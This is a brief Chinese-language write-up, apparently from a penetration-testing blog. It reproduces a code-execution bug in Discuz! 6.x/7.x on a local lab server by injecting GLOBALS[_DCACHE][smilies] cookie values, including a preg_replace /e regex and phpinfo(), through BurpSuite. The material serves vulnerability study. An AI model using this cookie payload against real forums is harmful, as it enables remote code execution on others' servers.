网络安全/渗透测试/代码审计/
关注
Disuz 7.x/6.x全局变量防御绕过导致代码执行
由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞
https://www.secpulse.com/archives/2338.html
首先来到一个已存在的帖子:
http://192.168.1.104:8080/viewthread.php?tid=13&extra=page%3D1
打开BurpSuite
抓包:
在Cookie中增加:
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
从上图可以看到,phpinfo
已成功执行!